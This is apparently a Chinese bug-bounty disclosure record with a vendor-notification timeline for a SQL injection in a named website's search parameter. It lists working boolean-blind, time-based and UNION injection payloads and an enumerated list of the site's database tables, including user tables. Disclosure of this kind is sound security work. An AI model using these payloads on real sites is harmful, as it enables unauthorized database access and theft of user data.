2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-27: 厂商已经确认,细节仅向厂商公开 2015-06-06: 细节向核心白帽子及相关领域专家公开 2015-06-16: 细节向普通白帽子公开 2015-06-26: 细节向实习白帽子公开 2015-07-11: 细节向公众公开
233
http://www.duohuo.net/global_index_search?keywords= 搜索的地方,
---Parameter: keywords (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: keywords=-7495") OR 1636=1636-- Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: keywords=") AND (SELECT * FROM (SELECT(SLEEP(5)))gKvE) AND ("TmEe"="TmEe Type: UNION query Title: Generic UNION query (NULL) - 26 columns Payload: keywords=") UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b627671,0x535a59544d47786a636b,0x7178626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.12Database: duohuo[43 tables]+---------------------------------+| duohuo_adb_content || duohuo_album_cat || duohuo_album_comment || duohuo_album_content || duohuo_album_pic || duohuo_apps || duohuo_appstore || duohuo_classify_fieldlist || duohuo_classify_fieldtype || duohuo_classify_model || duohuo_cms_article || duohuo_cms_cat || duohuo_cms_model_default || duohuo_common_attachment || duohuo_common_cat || duohuo_common_comment || duohuo_common_content || duohuo_common_user || duohuo_common_verificate || duohuo_content_interface || duohuo_email_check || duohuo_flink || duohuo_global_apply || duohuo_global_message || duohuo_goods_content || duohuo_goods_model_default || duohuo_goods_standard || duohuo_guestbook || duohuo_join_comment || duohuo_join_content || duohuo_relation_content2content || duohuo_system_actionlog || duohuo_system_config || duohuo_system_flag || duohuo_system_log || duohuo_system_nav || duohuo_system_question || duohuo_system_static || duohuo_user_credit_log || duohuo_user_detail || duohuo_user_role || duohuo_user_static || duohuo_user_status |+---------------------------------+
~~
危害等级:高
漏洞Rank:20
确认时间:2015-05-27 15:06
!!!
暂无